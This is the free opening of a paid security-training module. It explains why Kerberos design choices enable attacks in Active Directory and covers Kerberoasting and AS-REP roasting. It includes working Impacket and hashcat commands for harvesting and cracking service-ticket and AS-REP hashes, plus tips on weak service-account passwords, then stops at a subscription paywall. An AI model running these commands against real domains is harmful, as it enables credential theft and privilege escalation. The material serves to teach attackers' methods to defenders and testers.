Kerberos is 35+ years old. It was designed at MIT in 1988 for a specific threat model (one network, trusted users, malicious insiders rare). Active Directory bolted Kerberos onto Windows networks starting in 2000. The threat model never updated. Today, every Active Directory compromise report mentions Kerberos — Kerberoasting, AS-REP roasting, Golden Tickets, Silver Tickets, constrained delegation abuse, S4U2Self, resource-based constrained delegation. This module is about why Kerberos keeps producing attacks.
Why this happens
Kerberos has design features that made sense in 1988:
- Credentials as symmetric secrets (the user’s password hashes the session key)
- Tickets are data blobs that can be transferred and replayed until they expire
- Timestamps for replay protection (assumes synchronized clocks)
- Cross-realm trust bridges different networks (assumes realms trust each other)
- Delegation (A can act as B) for multi-hop service chains
Each of these features, in a 2026 network with attacker-controlled endpoints, becomes an attack. The attacker extracts tickets from memory. The attacker forges tickets using captured key material. The attacker abuses delegation to impersonate privileged accounts. The protocol works exactly as designed — and the design enables modern attacks.
Kerberoasting
Any user on the domain can request a service ticket (TGS) for any service principal. The ticket is encrypted with the service account’s password hash (specifically, its NT hash). Attacker extracts the hash offline and cracks it.
# Find users with SPN (Service Principal Name) set
# Service accounts are prime targets — often have weak passwords
GetUserSPNs.py CORP/alice.smith:Password1 -dc-ip 10.1.1.1 -request
# Output:
# [+] sqlsvc SPN: MSSQLSvc/sqlserver.corp.local:1433
# [+] websvc SPN: HTTP/webserver.corp.local
# [*] TGS for sqlsvc : $krb5tgs$23$*sqlsvc$CORP.LOCAL$MSSQLSvc/...$...
# Crack offline
hashcat -m 13100 tgs_hashes.txt rockyou.txt
# Service accounts often have never-changing passwords set when service deployed
# Common weak patterns: "$vcname$" + year, "Autumn2022!", service-related
# Successful crack → service account creds → often admin on the application server
Why this works in 2026: service accounts are often exempted from password rotation policies because rotating breaks services. They often have elevated privileges on specific servers. Cracking one can jump the attacker from “domain user” to “admin on critical application.”
AS-REP Roasting
Accounts with “Do not require Kerberos pre-authentication” set can have their AS-REP (authentication response) requested without authenticating. The AS-REP is encrypted with the user’s password hash — crackable offline.
# Find vulnerable accounts
GetNPUsers.py CORP/ -dc-ip 10.1.1.1 -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt
# Crack
hashcat -m 18200 asrep_hashes.txt rockyou.txt
# Legacy accounts (old automation, old applications) often have this flag
# Attacker doesn't need any credential to request AS-REPs
The feature was added for compatibility with pre-Kerberos-preauth systems (Unix Kerberos implementations from the 1990s). Almost never needed in 2026; almost always leaves vulnerable accounts behind.
🔐 Intermediate Module · Basic Tier
Continue reading with Basic tier (₹499/month)
You've read 25% of this module. Unlock the remaining deep-dive, quiz, and every other Intermediate module.
99+ modulesAll levels up to this tier
20-question quizzesUnlimited retries with explanations
Completion certificatesShareable on LinkedIn
9 more sections locked below
